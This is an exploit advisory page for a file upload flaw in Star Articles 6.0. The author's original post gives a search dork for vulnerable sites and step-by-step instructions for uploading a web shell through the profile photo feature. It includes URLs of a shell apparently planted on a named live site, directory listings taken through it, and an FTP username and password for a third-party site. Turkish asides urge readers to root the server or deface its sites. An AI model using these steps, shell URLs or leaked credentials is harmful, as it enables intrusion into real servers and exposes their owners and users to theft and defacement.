Star Articles 6.0 Remote File Upload Vulnerability

2009.08.27
Credit: ZoRLu
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[~] Star Articles 6.0 Remote File Upload [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu msn: trt-turk@hotmail.com [~] [~] Home: www.z0rlu.blogspot.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] dork: allinurl:"article.download.php" ( baya bi site var ) [~] [~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica ) [~] ----------------------------------------------------------- expl: http://script//authorphoto/user_name[id].php example: http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site ) http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil ) hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal: http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F bu serverdaki bir site icin: ftp://ftp.ababy.com.au/ ( ftp pass ve username ) user: kiddybab pass: KidEw1nk08 ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;) first register for site after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php ) click to gozat button and select your shell after upload you shell more after go repat edit profile page and you look you photo. right click to you photo select to properties copy photo link and paste you explorer. go your shell examp: user: trt-turk@hotmail.com passwd: zorlu1 login: http://www.lcfarticles.com/user.login.php shell: http://www.lcfarticles.com//authorphoto/zorlu40.php [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & RedHaK [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------

References:

http://xforce.iss.net/xforce/xfdb/46982
http://www.securityfocus.com/bid/32509
http://www.milw0rm.com/exploits/7251
http://secunia.com/advisories/32887
http://osvdb.org/50459


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top